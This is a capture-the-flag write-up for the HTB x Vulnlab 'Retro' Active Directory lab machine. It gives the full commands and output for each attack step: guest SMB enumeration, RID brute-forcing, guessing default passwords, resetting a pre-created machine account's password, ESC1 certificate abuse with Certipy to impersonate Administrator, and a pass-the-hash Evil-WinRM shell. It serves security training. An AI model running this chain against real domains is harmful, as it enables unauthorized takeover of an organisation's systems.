Skip to main content
Luban’s Docs
Luban’s Docs
  1. Posts/

HTB x VL Retro: Formal Write-up

·1748 words·9 mins· loading · loading · ·
HackTheBox Vulnlab Windows ADCS ESC1 Default Creds
Safwan Luban
Author
Safwan Luban
Security Engineer
Table of Contents
featured.png

Synopsis:
#

The Retro machine from HTB x Vulnlab was a Windows Active Directory Domain Controller. Initial access was gained by leveraging anonymous SMB enumeration and weak credentials for a ‘trainee’ user. Post-exploitation involved discovering clues in text files, leading to the compromise of a machine account (‘BANKING$’) by guessing its password and then resetting it. This access was then pivotal for privilege escalation via an Active Directory Certificate Services (AD CS) misconfiguration (ESC1), allowing the attacker to request a certificate as the Domain Administrator, ultimately leading to full administrative control over the domain controller.

Active Recon:
#

The engagement began with an nmap scan to identify open ports and services on the target machine, 10.10.84.158. The scan was executed with the command:

┌──(toothless5143@kali)-[~]
└─$ nmap -sV -Pn --min-rate=5000 10.10.84.158

Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-11 16:55 +06
Nmap scan report for 10.10.84.158
Host is up (0.16s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-05-11 10:55:37Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
3389/tcp open  ms-wbt-server Microsoft Terminal Services
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

This revealed several key services indicative of a Windows Domain Controller, including DNS (port 53), Kerberos (port 88), MSRPC (port 135), NetBIOS (port 139), LDAP (ports 389, 3268), LDAPS (ports 636, 3269), SMB (port 445), and RDP (port 3389). The nmap output also identified the domain as retro.vl0. (though later interactions used retro.vl) and confirmed the host was a DC running Windows.

To facilitate further enumeration using domain names, the host’s IP address was added to the local /etc/hosts file:

┌──(toothless5143@kali)-[~]
└─$ echo "10.10.84.158 retro.vl" | sudo tee -a /etc/hosts
10.10.84.158 retro.vl

Initial interaction with the SMB service was attempted using nxc (NetExec) with Guest credentials:

┌──(toothless5143@kali)-[~]
└─$ nxc smb 10.10.84.158 -u "Guest" -p ""
SMB         10.10.84.158    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB         10.10.84.158    445    DC               [+] retro.vl\Guest:

This confirmed that guest access to SMB was possible on the domain controller, using the null password.

Vulnerability Analysis & Exploitation:
#

An attempt was made to enumerate domain users using RID brute forcing via impacket-lookupsid with guest credentials:

┌──(toothless5143@kali)-[~]
└─$ impacket-lookupsid [email protected] -no-pass | grep SidTypeUser
500: RETRO\Administrator (SidTypeUser)
501: RETRO\Guest (SidTypeUser)
502: RETRO\krbtgt (SidTypeUser)
1000: RETRO\DC$ (SidTypeUser)
1104: RETRO\trainee (SidTypeUser)
1106: RETRO\BANKING$ (SidTypeUser)
1107: RETRO\jburley (SidTypeUser)
1109: RETRO\tblack (SidTypeUser)

A userlist (users.txt) was created containing the previously enumerated users.

jburley
HelpDesk
tblack
trainee
DC$
BANKING$

An attempt was then made to authenticate against SMB with these users using null passwords:

┌──(toothless5143@kali)-[~]
└─$ nxc smb retro.vl -u users.txt -p "" --continue-on-success
SMB         10.10.84.158    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB         10.10.84.158    445    DC               [-] retro.vl\jburley: STATUS_LOGON_FAILURE
SMB         10.10.84.158    445    DC               [+] retro.vl\HelpDesk: (Guest)
SMB         10.10.84.158    445    DC               [-] retro.vl\tblack: STATUS_LOGON_FAILURE
SMB         10.10.84.158    445    DC               [-] retro.vl\trainee: STATUS_LOGON_FAILURE
SMB         10.10.84.158    445    DC               [-] retro.vl\DC$: STATUS_LOGON_FAILURE
SMB         10.10.84.158    445    DC               [-] retro.vl\BANKING$: STATUS_LOGON_FAILURE

This revealed that the HelpDesk account, when tried with a null password, resulted in a Guest session, indicating that null password authentication as Guest was permitted for the HelpDesk user.

Leveraging this anonymous/guest access, SMB shares were listed using:

┌──(toothless5143@kali)-[~]
└─$ smbclient -L //retro.vl//
Password for [WORKGROUP\toothless5143]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share
        Notes           Disk
        SYSVOL          Disk      Logon server share
        Trainees        Disk

This listed several shares, including ADMIN$, C$, IPC$, NETLOGON, Notes, SYSVOL, and crucially, a share named Trainees. The Trainees share was accessed anonymously using:

┌──(toothless5143@kali)-[~]
└─$ smbclient  //retro.vl/Trainees -N
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Jul 24 03:58:43 2023
  ..                                DHS        0  Wed Jul 26 15:54:14 2023
  Important.txt                       A      288  Mon Jul 24 04:00:13 2023

                6261499 blocks of size 4096. 2886079 blocks available
smb: \> get Important.txt
getting file \Important.txt of size 288 as Important.txt (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec)

Inside this share, a file named Important.txt was found and downloaded.

The content of Important.txt was revealing:

┌──(toothless5143@kali)-[~]
└─$ cat Important.txt
Dear Trainees,

I know that some of you seemed to struggle with remembering strong and unique passwords.
So we decided to bundle every one of you up into one account.
Stop bothering us. Please. We have other stuff to do than resetting your password every day.

Regards

The Admins

This strongly suggested that the ‘trainee’ account, found during RID cycling, might have a weak or default password. An attempt to authenticate to LDAP as trainee with the password trainee was successful:

┌──(toothless5143@kali)-[~]
└─$ nxc ldap retro.vl -u "trainee" -p "trainee"
SMB         10.10.84.158    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
LDAP        10.10.84.158    389    DC               [+] retro.vl\trainee:trainee

This granted the attacker initial authenticated access to the domain.

With credentials for the trainee user, the attacker proceeded to explore accessible resources. The Notes SMB share, previously identified, was accessed using:

┌──(toothless5143@kali)-[~]
└─$ smbclient -U trainee%trainee \\\\retro.vl\\Notes
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Jul 24 04:03:16 2023
  ..                                DHS        0  Wed Jul 26 15:54:14 2023
  ToDo.txt                            A      248  Mon Jul 24 04:05:56 2023

                6261499 blocks of size 4096. 2885371 blocks available
smb: \> get ToDo.txt
getting file \ToDo.txt of size 248 as ToDo.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)

Within the Notes share, a file named ToDo.txt was discovered and downloaded.

The contents of ToDo.txt provided another critical clue:

┌──(toothless5143@kali)-[~]
└─$ cat ToDo.txt
Thomas,

after convincing the finance department to get rid of their ancienct banking software
it is finally time to clean up the mess they made. We should start with the pre created
computer account. That one is older than me.

Best

James

This message hinted at a “pre created computer account” related to banking software. The BANKING$ account, identified earlier via RID cycling (machine accounts typically end with a ‘$’), became the prime suspect. Pre created computer accounts has the same password as the name, but all characters are in lowercase format.

Lateral Movement:
#

Based on the hint from ToDo.txt, an attempt was made to authenticate as the BANKING$ machine account using a guessed password. The password “banking” proved successful:

┌──(toothless5143@kali)-[~]
└─$ nxc smb retro.vl -u "BANKING$" -p "banking"
SMB         10.10.84.158    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB         10.10.84.158    445    DC               [+] retro.vl\BANKING$:banking

This granted access as the BANKING$ machine account. As pre created computer accounts have the default privilege to change their own passwords on first login. To ensure persistent and known access, the attacker changed the password for BANKING$ to Password123 using impacket-changepasswd:

┌──(toothless5143@kali)-[~]
└─$ impacket-changepasswd -p rpc-samr retro.vl/BANKING\[email protected] -newpass Password123
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

Current password:
[*] Changing the password of retro.vl\BANKING$
[*] Connecting to DCE/RPC as retro.vl\BANKING$
[*] Password was changed successfully.

(using “banking” as the current password when prompted). The password change was successful.

Privilege Escalation:
#

With control over the BANKING$ machine account and its new password Password123, the attacker focused on Active Directory Certificate Services (AD CS) for privilege escalation. Certipy was used to enumerate AD CS configurations:

┌──(toothless5143@kali)-[~]
└─$ certipy-ad find -target 10.10.84.158 -u BANKING$ -p Password123
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'retro-DC-CA' via CSRA
[!] Got error while trying to get CA configuration for 'retro-DC-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'retro-DC-CA' via RRP
[*] Got CA configuration for 'retro-DC-CA'
[*] Saved BloodHound data to '20250511211902_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k
[*] Saved text output to '20250511211902_Certipy.txt'
[*] Saved JSON output to '20250511211902_Certipy.json'
Object Control Permissions
        Owner                           : RETRO.VL\Administrator
        Write Owner Principals          : RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
                                          RETRO.VL\Administrator
        Write Dacl Principals           : RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
                                          RETRO.VL\Administrator
        Write Property Principals       : RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
                                          RETRO.VL\Administrator
    [!] Vulnerabilities
      ESC1                              : 'RETRO.VL\\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication

The details indicated that 'RETRO.VL\\Domain Computers' (which BANKING$ is a member of) could enroll in the 'RetroClients' certificate template, and this template allowed the enrollee to supply the Subject Alternative Name (SAN) and was configured for client authentication.

This ESC1 vulnerability was exploited by requesting a certificate as the BANKING$ user but specifying the User Principal Name (UPN) of [email protected] in the certificate request. The command used was:

┌──(toothless5143@kali)-[~]
└─$ certipy-ad req -username BANKING$ -password Password123 -target-ip 10.10.84.158 -ca 'retro-DC-CA' -template 'RetroClients' -upn '[email protected]' -key-size 4096
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 16
[*] Got certificate with UPN '[email protected]'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'

A certificate administrator.pfx was successfully issued for [email protected].

This certificate was then used to authenticate as the Administrator and obtain a Kerberos Ticket Granting Ticket (TGT):

┌──(toothless5143@kali)-[~]
└─$ certipy-ad auth -pfx 'administrator.pfx' -username 'Administrator' -domain 'retro.vl' -dc-ip 10.10.84.158
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: [email protected]
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for '[email protected]': 252fac<REDACTED>0368389

This process also successfully retrieved the NTLM hash for the [email protected] account: 252fac<REDACTED>0368389.

Finally, with the Administrator’s NTLM hash (252fac<REDACTED>0368389), a remote shell was obtained on the domain controller using Evil-WinRM:

┌──(toothless5143@kali)-[~]
└─$ evil-winrm -i retro.vl -u administrator -H 252fac<REDACTED>0368389

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>

This granted the attacker full administrative access to the system, leading to the compromise of the Retro box and acquisition of the flag.

Signing out,

  • Toothless
Reply by Email